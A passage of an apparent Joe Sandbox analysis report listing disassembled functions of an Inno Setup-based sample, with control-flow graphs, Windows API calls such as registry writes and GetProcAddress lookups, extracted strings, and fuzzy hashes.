                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                Function 00455588 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                                • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                                Function 0042F530 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                                                • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8
                                                                                Function 0046F300 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 460 46f58c-46f5b1 call 40b44c call 46f0ec 457->460 461 46f54d-46f58b call 46f0ec * 3 457->461 479 46f5b3-46f5be call 47bfd8 460->479 480 46f5c0-46f5c9 call 403494 460->480 461->460 491 46f5ce-46f5d9 call 478d20 479->491 480->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 580 46f926-46f92d 579->580 581 46f85d-46f864 579->581 585 46f987-46f99d RegCloseKey 580->585 586 46f92f-46f965 call 4946bc 580->586 583 46f866-46f86d 581->583 584 46f8d1-46f8e0 581->584 583->584 589 46f86f-46f893 call 430bdc 583->589 588 46f8e3-46f8f0 584->588 586->585 592 46f907-46f920 call 430c18 call 46f15c 588->592 593 46f8f2-46f8ff 588->593 589->588 601 46f895-46f896 589->601 604 46f925 592->604 593->592 597 46f901-46f905 593->597 597->580 597->592 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->580 609->610 610->603 612 46f8cf 610->612 612->588
                                                                                APIs
                                                                                  • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                  • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close
                                                                                • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                • API String ID: 3391052094-1769338133
                                                                                • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                                                • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59
                                                                                Function 00492208 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492284 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c5 call 447008 call 403738 FindWindowA call 447288 1037->1047 1056 492289 1038->1056 1054 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1054 1055 492320-49232d call 403684 1046->1055 1047->1036 1054->1036 1064 49237c-492389 call 403684 1055->1064 1065 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1055->1065 1056->1036 1076 4923d8-4923e5 call 403684 1064->1076 1077 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1064->1077 1065->1036 1089 492412-49241f call 403684 1076->1089 1090 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1076->1090 1077->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1089->1102 1103 492460-49246d call 403684 1089->1103 1090->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1128 492508-492515 call 403684 1116->1128 1129 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1129 1140 49256a-492577 call 403684 1128->1140 1141 492517-492535 call 447008 call 42e3a4 1128->1141 1129->1036 1151 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1151 1152 4925f1-4925fe call 403684 1140->1152 1158 492547-492555 GetLastError call 447288 1141->1158 1159 492537-492545 call 447288 1141->1159 1183 4925e1-4925ec call 4470e0 1151->1183 1184 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1151->1184 1164 492600-492621 call 446fac FreeLibrary call 4470e0 1152->1164 1165 492626-492633 call 403684 1152->1165 1170 49255a-492565 call 447288 1158->1170 1159->1170 1164->1036 1180 492658-492665 call 403684 1165->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1165->1181 1170->1036 1191 49269b-4926a8 call 403684 1180->1191 1192 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1192 1181->1036 1183->1036 1184->1036 1204 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1191->1204 1205 4926de 1191->1205 1192->1036 1204->1036 1205->1036
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FindSleepWindow
                                                                                • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                • API String ID: 3078808852-3310373309
                                                                                • Opcode ID: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                                • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                • Opcode Fuzzy Hash: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                                • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359
                                                                                Function 004834FC Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1592 483592-48359b 1590->1592 1591->1592 1593 48353b-483546 GetCurrentProcess 1591->1593 1594 4835ab-4835b2 1592->1594 1595 48359d-4835a1 1592->1595 1593->1592 1602 483548-48354c 1593->1602 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1604 48354e-483555 call 452708 1602->1604 1604->1592 1607 483557-483564 GetProcAddress 1604->1607 1607->1592 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 48357f-483586 1608->1609 1609->1592
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                • API String ID: 2230631259-2623177817
                                                                                • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E
                                                                                Function 004690F4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1635 4691f7-4691fe 1633->1635 1636 4691cc-4691ee call 42dd5c call 42dd74 1633->1636 1634->1633 1639 469257-46925e 1635->1639 1640 469200-469225 call 42dd5c * 2 1635->1640 1636->1635 1655 4691f0 1636->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1662 469227-469230 call 431508 1640->1662 1663 469235-469247 call 42dd5c 1640->1663 1648 4692e6-4692fc RegCloseKey 1642->1648 1649 4692ad-4692e1 call 42dd5c * 3 1642->1649 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1649->1648 1655->1635 1656->1657 1657->1642 1670 469296-46929f call 431508 1657->1670 1662->1663 1663->1639 1671 469249-469252 call 431508 1663->1671 1670->1642 1671->1639
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                Strings
                                                                                • Inno Setup: Setup Type, xrefs: 00469206
                                                                                • Inno Setup: No Icons, xrefs: 004691DF
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                • %s\%s_is1, xrefs: 00469171
                                                                                • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                • Inno Setup: Selected Components, xrefs: 00469216
                                                                                • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                • Inno Setup: App Path, xrefs: 004691B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1093091907
                                                                                • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59
                                                                                Function 0047CB30 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1965 47cbb3-47cbb9 1961->1965 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1965->1959 1965->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(70020000,SHGetFolderPathA), ref: 0047CC32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                • API String ID: 190572456-1821436788
                                                                                • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D
                                                                                Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD
                                                                                Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2628 423901 2627->2628 2629 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2629 2628->2629 2641 423962-423975 call 424188 SendMessageA 2629->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2629->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
                                                                                APIs
                                                                                  • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                                • GetSystemMetrics.USER32(00000000), ref: 004238E9
